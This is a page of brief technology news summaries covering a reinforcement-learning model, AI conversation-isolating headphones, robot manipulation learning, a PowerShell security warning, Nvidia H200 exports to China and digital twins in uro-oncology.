Toggle light / dark theme

New model frames human reinforcement learning in the context of memory and habits

Humans and most other animals are known to be strongly driven by expected rewards or adverse consequences. The process of acquiring new skills or adjusting behaviors in response to positive outcomes is known as reinforcement learning (RL).

RL has been widely studied over the past decades and has even been adapted to train some computational models, such as some deep learning algorithms. Existing models of RL suggest that this type of learning is linked to dopaminergic pathways (i.e., neural pathways that respond to differences between expected and experienced outcomes).

Anne G. E. Collins, a researcher at University of California, Berkeley, recently developed a new model of RL specific to situations in which people’s choices have uncertain context-dependent outcomes, and they try to learn the actions that will lead to rewards. Her paper, published in Nature Human Behaviour, challenges the assumption that existing RL algorithms faithfully mirror psychological and neural mechanisms.

AI headphones automatically learn who you’re talking to—and let you hear them better

Holding a conversation in a crowded room often leads to the frustrating “cocktail party problem,” or the challenge of separating the voices of conversation partners from a hubbub. It’s a mentally taxing situation that can be exacerbated by hearing impairment.

As a solution to this common conundrum, researchers at the University of Washington have developed smart headphones that proactively isolate all the wearer’s conversation partners in a noisy soundscape. The headphones are powered by an AI model that detects the cadence of a conversation and another model that mutes any voices that don’t follow that pattern, along with other unwanted background noises. The prototype uses off-the-shelf hardware and can identify conversation partners using just two to four seconds of audio.

The system’s developers think the technology could one day help users of hearing aids, earbuds and smart glasses to filter their soundscapes without the need to manually direct the AI’s “attention.”

Infant-inspired framework helps robots learn to interact with objects

Over the past decades, roboticists have introduced a wide range of advanced systems that can move around in their surroundings and complete various tasks. Most of these robots can effectively collect images and other data in their surroundings, using computer vision algorithms to interpret it and plan their future actions.

In addition, many robots leverage large language models (LLMs) or other natural language processing (NLP) models to interpret instructions, make sense of what users are saying and answer them in specific languages. Despite their ability to both make sense of their surroundings and communicate with users, most robotic systems still struggle when tackling tasks that require them to touch, grasp and manipulate objects, or come in physical contact with people.

Researchers at Tongji University and State Key Laboratory of Intelligent Autonomous Systems recently developed a new framework designed to improve the process via which robots learn to physically interact with their surroundings.

Windows PowerShell now warns when running Invoke-WebRequest scripts

Microsoft says Windows PowerShell now warns when running scripts that use the Invoke-WebRequest cmdlet to download web content, aiming to prevent potentially risky code from executing.

As Microsoft explains, this mitigates a high-severity PowerShell remote code execution vulnerability (CVE-2025–54100), which primarily affects enterprise or IT-managed environments that use PowerShell scripts for automation, since PowerShell scripts are not as commonly used outside such environments.

The warning has been added to Windows PowerShell 5.1, the PowerShell version installed by default on Windows 10 and Windows 11 systems, and is designed to add the same secure web parsing process available in PowerShell 7.

Nvidia can sell the more advanced H200 AI chip to China — but will Beijing want them?

Nvidia has approval from the U.S. government to sell its more advanced H200 AI chips to China. But the question is whether Beijing wants it or will let companies buy it.

The company can now ship its H200 chip to “approved customers”, provided the U.S. government gets a 25% cut of those sales. It had been effectively banned from selling any semiconductors to China earlier this year, but since July sought to resume H20 sales, a less advanced chip designed specifically to comply with export restrictions.

Reports had suggested Beijing prohibited local companies from buying the H20. Nvidia is not baking in huge China sales into its forecasts as a result. After the ban was lifted, the Financial Times reported China would “limit access” to the H200, citing unidentified sources.

Google CEO Sundar Pichai hints at building data centres in space; Elon Musk replies

The TOI Tech Desk is a dedicated team of journalists committed to delivering the latest and most relevant news from the world of technology to readers of The Times of India. TOI Tech Desk’s news coverage spans a wide spectrum across gadget launches, gadget reviews, trends, in-depth analysis, exclusive reports and breaking stories that impact technology and the digital universe. Be it how-tos or the latest happenings in AI, cybersecurity, personal gadgets, platforms like WhatsApp, Instagram, Facebook and more; TOI Tech Desk brings the news with accuracy and authenticity.

Digital twins for personalized treatment in uro-oncology in the era of artificial intelligence

This Review focuses on the clinical effects and translational potential of digital twin applications in uro-oncology, highlights challenges and discusses future directions for implementing digital twins to achieve personalized uro-oncological diagnostics and treatment.

/* */